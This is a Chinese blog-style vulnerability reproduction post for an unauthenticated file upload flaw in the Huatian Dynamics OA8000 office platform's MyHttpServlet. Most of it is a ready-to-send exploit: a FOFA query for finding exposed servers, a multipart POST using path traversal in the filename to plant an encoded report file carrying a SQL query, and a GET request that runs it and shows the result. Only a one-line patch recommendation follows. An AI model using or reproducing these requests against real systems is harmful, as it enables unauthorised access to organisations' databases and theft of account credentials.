华天动力-OA8000 MyHttpServlet 文件上传漏洞复现

0x01 产品简介

华天动力OA是一款将先进的管理思想、 管理模式和软件技术、网络技术相结合,为用户提供了低成本、 高效能的协同办公和管理平台。

0x02 漏洞概述

华天动力OA MyHttpServlet 存在任意文件上传漏洞,未经身份认证的攻击者可上传恶意的raq文件并执行raq文件中的任意sql语句,获取用户账号密码等敏感信息。

0x03 影响范围

OA8000平台版 DLHT-OA8000-3-0-7.2-3-1-0-500

0x04 复现环境

FOFA:app="华天动力-OA8000"

0x05 漏洞复现

exp:

复制代码
POST /OAapp/MyHttpServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=9b0af0d79eaea67c3aa1889b0b43a50a
Accept-Encoding: gzip
Content-Length: 2428

--9b0af0d79eaea67c3aa1889b0b43a50a
Content-Disposition: form-data; name="file"; filename="\\Temp\\../../../report/reportFiles/d4f0fE.jpg"

{{unquote("RQQR\x00\x00\x01\xf5\x00\x00\x00\x02\x00\x02\x00\x00\x00\x1c\xa5A\x00\x00\x00\x01\x00\x00\x00\x00\x02\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x06\xac\xed\x00\x05pp\x00\x00\x00\x1b\xb1B\x18ff\x01\x00\x00\x00\x00\x02\x00\x00\xff\xff\xff\xff\x00\x00\x00\x06\xac\xed\x00\x05pp\x00\x00\x00\xac\xff\xff\xff\xff\xd0\xe1P\xff\x00\x00\x00?\x80\x00\x00\x10\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\"1\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xf8Dialog\x00\x0c\xff\xff\xff\xff\xff\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xffP?@\x00\x00\xff\x00\x00\x00P?@\x00\x00\xff\x00\x00\x00P?@\x00\x00\xff\x00\x00\x00S?@\x00\x00\xff\x00\x00\x00\x00\x00\x00\x15\x00\x01\x28\x01\x00\x0f ds1.select\x28#1\x29\x00 \xc0\xff\xff\xff\xff\x00\x00\xff\xff\xff\xff\x00\x00\x00\x06\xac\xed\x00\x05pp\xff\xff\xff\xff\x00\x00\x00\x00\x00;\x00\x09\x00\x01\x00\x01\x00\x01\x00\x00\x00\x14\x00\x01\x00\x01\x00dCR\x00\x00C\x94\x80\x00A\x98\x00\x00A\x98\x00\x00A\xc8\x00\x00A\xc8\x00\x00\x01\x00\x00\x02\x00\x00\x02\x00\x02\x01\x01\x00\x00\xff\xff\xff\xfe\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00s\x00\x01\x01\xff\xff\xff\xd0com.runqian.report4.usermodel.SQLDataSetConfig\x00\x00\x00:\x00\x00\x00\x17\xff\xff\xff\xfbds1\xff\xff\xff\xfahtoa\xff\xff\xff\xfe\x00\x01\x00\x00\xff\xff\xff\xf1SELECT user\x28\x29\xff\xff\xff\xfe\xff\xff\xff\xfe\xff\xff\xff\xff\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x0a\x00\xff\xff\xff\xfe\x0b\x00\x00\x00\x00\x00\x00\x00\x12\xff\xff\xff\xfe\xff\xff\xff\xfe\x00\x00\x0f<\xff\xff\xff\xfe\x03\x01\x00\x00\x00d\x01\xff\xff\xff\xfe\x00\xff\xff\xff\xfe\xff\xff\xff\xff\xff\xff\xff\xfeRQQRRQQR\x1e\xf9\xb0\xac\xda\x8d\x80s\x83\xf4h\xc5\xc0#\xb4\xeb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")}}
--9b0af0d79eaea67c3aa1889b0b43a50a--

PS:文件中的SQL语句是查询数据库当前用户

查看结果

复制代码
GET /report/reportJsp/showHTReport.jsp?reportFile=上传的文件名 HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

0x06 修复建议

目前厂商已发布安全补丁,请及时更新:http://www.oa8000.com

相关推荐
神经毒素1 小时前
WEB安全--文件上传漏洞--36C3 CTF includer bypass
linux·安全·web安全
DPLSLAB61 小时前
数字孪生重构安全边界:无人机 “虚拟孪生体“ 的预演革命 —— 北京智慧云测构建全要素仿真体系
安全·重构·无人机
蒜白3 小时前
28--当路由器开始“宫斗“:设备控制面安全配置全解
安全·网络工程师·路由·ospf·bgp
扣脚大汉在网络3 小时前
云原生安全渗透篇
安全·云原生·dubbo
vortex55 小时前
Windows 权限配置文件解析与安全分析(GPP,GPO,LSA)
windows·安全·渗透测试
网络安全指导员5 小时前
如何在JMeter中配置断言,将非200状态码视为测试成功
网络·学习·jmeter·安全·web安全·架构
virelin_Y.lin5 小时前
系统与网络安全------Windows系统安全(5)
安全·系统安全·磁盘分区
红肤色7 小时前
【网络安全基础】CentOS 7超详细安装教程(含镜像)
linux·运维·服务器·安全·网络安全·centos
Sean_summer7 小时前
木马学习记录
web安全
币之互联万物1 天前
AQUA爱克泳池设备入驻济南校园,以品质筑牢游泳教育安全防线
安全